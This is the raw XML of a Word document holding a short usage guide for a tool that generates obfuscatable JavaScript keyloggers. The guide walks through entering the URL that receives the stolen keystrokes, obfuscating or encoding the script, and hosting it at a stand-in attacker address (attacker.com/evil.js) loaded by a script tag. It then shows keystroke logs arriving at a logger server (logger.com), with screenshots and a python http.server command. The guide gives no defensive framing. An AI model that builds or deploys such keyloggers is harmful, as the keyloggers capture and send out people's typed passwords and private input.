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E82F7" w14:textId="65BA2876" w:rsidR="00591FF4" w:rsidRPr="00591FF4" w:rsidRDefault="00591FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591FF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Guide to implement the code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EF9E2" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4"/>
    <w:p w14:paraId="55075DEA" w14:textId="7582EB6F" w:rsidR="00354508" w:rsidRDefault="00591FF4">
      <w:r w:rsidRPr="00591FF4">
        <w:t>The tool currently supports US QWERTY keyboard layout, but it can be easily extended to support other keyboard layouts by modifying the source code. The generated script can also be obfuscated and encoded in various formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28792F61" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4"/>
    <w:p w14:paraId="4B83531E" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t># Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08189505" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t>## Part 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3219A29B" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4"/>
    <w:p w14:paraId="1C7FDA38" w14:textId="3EB481F1" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t xml:space="preserve">1. Go to: </w:t>
      </w:r>
      <w:r>
        <w:t>implemented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE35BE0" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t xml:space="preserve">2. Fill in the necessary information in the form, including the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>URL  for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the keylogger script and the interval timeout (in milliseconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00488FCC" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t xml:space="preserve">3. Choose whether to encode or obfuscate the generated keylogger </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>script, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> select the appropriate options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC13C7A" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t>4. Click the "Generate" button to create the keylogger script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623A1D70" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t>5. Copy the generated script and paste it into a new JavaScript file in your logger website. ``</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>`(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Example: https://attacker.com/evil.js)```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A884959" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4"/>
    <w:p w14:paraId="0972B83F" w14:textId="7B4CD71D" w:rsidR="00591FF4" w:rsidRPr="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591FF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Part 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1113055B" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t xml:space="preserve">1. Add the keylogger script to your web page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C13DF1" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4"/>
    <w:p w14:paraId="0D71FDC7" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t xml:space="preserve">Example: attacker.com includes ```&lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="https://attacker.com/evil.js"&gt;```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692169BF" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4"/>
    <w:p w14:paraId="41E2B5E7" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t>2. Launch the web page ``</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>`(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>in this case is attacker.com)``` and start typing. The keylogger will begin logging your keystrokes and sending them to the specified URL ``</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>`(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>in this case is logger.com)``` at the specified interval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31693FE0" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4"/>
    <w:p w14:paraId="2DC44FDD" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t>You can easily use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F38A2CE" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4"/>
    <w:p w14:paraId="1ACAAAA8" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132359B" w14:textId="6C019F22" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758A9782" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4"/>
    <w:p w14:paraId="4C686C98" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4"/>
    <w:p w14:paraId="14F002D5" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRPr="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591FF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D42DBBA" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t>1. Create and copy the keylogging script. Paste this into the script.js file on your attacker website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE63302" w14:textId="2C37FBC8" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="565382C1" wp14:editId="2E331AFE">
            <wp:extent cx="5731510" cy="5231130"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="3030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231130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3FAD91" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t>2. Go to the website that added the keylogger script. Send some keystrokes. (script.js is the generated script)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1CEA10" w14:textId="334E0019" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27047D35" wp14:editId="7A389D09">
            <wp:extent cx="5731510" cy="2479675"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="208363725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37253" name="Picture 2"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p>
    <w:p w14:paraId="2EF26559" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4"/>
    <w:p w14:paraId="7E54203E" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4"/>
    <w:p w14:paraId="7C65E268" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:t>3. Logs started to appear on the logger server at the "Source URL" you filled in the form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BABA198" w14:textId="77777777" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4"/>
    <w:p w14:paraId="08AED75F" w14:textId="423EE693" w:rsidR="00591FF4" w:rsidRDefault="00591FF4" w:rsidP="00591FF4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2835F252" wp14:editId="46B86EC7">
            <wp:extent cx="5731510" cy="763905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="118915048"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5048" name="Picture 3" descr="A black background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63905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00591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F4"/>
    <w:rsid w:val="00134E0C"/>
    <w:rsid w:val="00354508"/>
    <w:rsid w:val="00591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CBF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CC2C571F-A659-4D2F-9FCA-EA547F9B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FF4"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00591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FF4"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00591FF4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00591FF4"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00591FF4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00591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FF4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00591F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421241">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="181131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Katankur Uday Kumar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Katankur Uday Kumar</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-01T17:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-01T17:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>